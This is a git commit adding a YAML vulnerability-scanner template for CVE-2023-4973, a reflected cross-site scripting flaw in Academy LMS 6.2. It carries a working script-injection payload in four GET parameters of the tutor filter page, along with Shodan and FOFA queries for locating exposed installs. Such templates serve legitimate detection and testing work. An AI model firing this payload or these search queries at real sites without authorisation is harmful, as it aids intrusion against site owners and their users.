Create CVE-2023-4973.yaml

patch-1
Ritik Chaddha 2024-04-23 18:52:32 +05:30 committed by GitHub
parent 02f7ca3d98
commit 5980cf82f5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2023-4973
info:
name: Academy LMS 6.2 - Cross-Site Scripting
author: ritikchaddha,princechaddha
severity: medium
description: |
A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.
reference:
- https://packetstormsecurity.com/files/174680/Academy-LMS-6.2-Cross-Site-Scripting.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4973
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4973
cwe-id: CWE-79
cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: creativeitem
product: academy_lms
shodan-query: html:"Academy LMS"
fofa-query: body="Academy LMS"
tags: cve2023,cve,academylms,xss,creativeitem
http:
- method: GET
path:
- "{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")'
condition: and